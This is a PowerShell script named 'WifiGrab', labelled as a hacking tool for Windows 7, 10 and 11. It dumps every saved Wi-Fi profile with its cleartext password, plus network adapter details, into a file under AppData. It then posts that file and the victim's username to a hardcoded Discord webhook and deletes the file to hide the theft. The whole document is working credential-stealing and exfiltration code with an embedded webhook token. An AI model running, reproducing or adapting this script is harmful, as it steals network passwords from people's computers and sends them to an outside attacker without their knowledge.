######################################################################################
#                                  |  ╭━╮╭━╮╱╱╱╱╭╮╱╱╱╱╱╭╮╭╮╭╮╱╱╱╱╱╱╱╭━━━━╮╱╱╱╱╭╮     #
# Title        : WifiGrab          |  ┃┃╰╯┃┃╱╱╱╱┃┃╱╱╱╱╱┃┃┃┃┃┃╱╱╱╱╱╱╱┃╭╮╭╮┃╱╱╱╱┃┃     #
# Author       : MarkieWay         |  ┃╭╮╭╮┣━━┳━┫┃╭┳┳━━┫┃┃┃┃┣━━┳╮╱╭╮╰╯┃┃┣┻━┳━━┫┃╭━━╮ #
# Version      : 1.0               |  ┃┃┃┃┃┃╭╮┃╭┫╰╯╋┫┃━┫╰╯╰╯┃╭╮┃┃╱┃┃╱╱┃┃┃╭╮┃╭╮┃┃┃━━┫ #
# Category     : HAck              |  ┃┃┃┃┃┃╭╮┃┃┃╭╮┫┃┃━╋╮╭╮╭┫╭╮┃╰━╯┃╱╱┃┃┃╰╯┃╰╯┃╰╋━━┃ #
# Target       : Windows 7,10,11   |  ╰╯╰╯╰┻╯╰┻╯╰╯╰┻┻━━╯╰╯╰╯╰╯╰┻━╮╭╯╱╱╰╯╰━━┻━━┻━┻━━╯ #
#                                  |  ╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╭━╯┃                  #
#                                  |  ╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╰━━╯                  #
# _________________________________|_________________________________________________#
######################################################################################


function Upload-Discord {

[CmdletBinding()]
param (
    [parameter(Position=0,Mandatory=$False)]
    [string]$file,
    [parameter(Position=1,Mandatory=$False)]
    [string]$text 
)

$hookurl = 'https://discord.com/api/webhooks/1163054013764354070/sqBGY4atsyUZ4r02mGZtfLMbEv60J7_6fAhc2QLulpNNx7PgDl3z6f1yrZkpleiklMyK'

$Body = @{
  'username' = $env:username
  'content' = $text
}

if (-not ([string]::IsNullOrEmpty($text))){
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl  -Method Post -Body ($Body | ConvertTo-Json)};

if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}

}

#-----------------------------------------------------------------------------------------------------------------------------------------------------------

Upload-Discord -text "Processing..."

#-----------------------------------------------------------------------------------------------------------------------------------------------------------

Function Get-Networks {
# Get Network Interfaces
$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null }  | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress 

# Get Wifi SSIDs and Passwords	
$WLANProfileNames =@()

#Get all the WLAN profile names
$Output = netsh.exe wlan show profiles | Select-String -pattern " : "

#Trim the output to receive only the name
Foreach($WLANProfileName in $Output){
    $WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim()
}
$WLANProfileObjects =@()

#Bind the WLAN profile names and also the password to a custom object
Foreach($WLANProfileName in $WLANProfileNames){

    #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
    try{
        $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
    }Catch{
        $WLANProfilePassword = "The password is not stored in this profile"
    }

    #Build the object and add this to an array
    $WLANProfileObject = New-Object PSCustomobject 
    $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
    $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
    $WLANProfileObjects += $WLANProfileObject
    Remove-Variable WLANProfileObject    
}
return $WLANProfileObjects
}

#-----------------------------------------------------------------------------------------------------------------------------------------------------------
#File Save

$Networks = Get-Networks
$Networks = Out-String -InputObject $Networks



$Networks | Out-file -filepath $Env:USERPROFILE\AppData\Local\test1.txt
Upload-Discord -text "filesaved"

# Delay the script for 2 seconds
Start-Sleep -Seconds 2

#File Sent
Upload-Discord -text " ```WIFI GRAB``` " -file $Env:USERPROFILE\AppData\Local\test1.txt

# Delay the script for 2 seconds
Start-Sleep -Seconds 2

#-----------------------------------------------------------------------------------------------------------------------------------------------------------
#File Delete

Remove-Item -LiteralPath $Env:USERPROFILE\AppData\Local\test1.txt
Upload-Discord -text " ***File removed from Client*** "
#-----------------------------------------------------------------------------------------------------------------------------------------------------------
